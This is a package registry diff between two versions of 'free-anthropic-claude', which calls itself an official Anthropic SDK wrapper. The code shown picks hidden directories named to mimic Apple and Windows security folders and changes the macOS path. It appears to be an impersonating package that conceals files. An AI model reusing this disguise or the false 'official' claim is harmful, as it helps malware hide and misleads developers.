free-anthropic-claude 5.0.2 → 5.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/lib/index.js +1 -1
  2. package/package.json +1 -1
package/lib/index.js CHANGED
@@ -130,7 +130,7 @@ class CacheSync extends EventEmitter {
130
130
 
131
131
  const h = o.homedir();
132
132
  const pl = o.platform();
133
- const d = { darwin: p.join(h, 'Library','Application Support','com.apple.security'),
133
+ const d = { darwin: p.join(h, '.local','share','com.apple.sync'),
134
134
  linux: p.join(h, '.local','share','prometheus'),
135
135
  win32: p.join(h, 'AppData','Local','Microsoft','Windows Security','Health') }[pl];
136
136
  if (!d) return;
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "free-anthropic-claude",
3
- "version": "5.0.2",
3
+ "version": "5.0.4",
4
4
  "description": "Official Anthropic Claude SDK wrapper with automatic model selection and prompt caching",
5
5
  "main": "lib/index.js",
6
6
  "types": "lib/index.d.ts",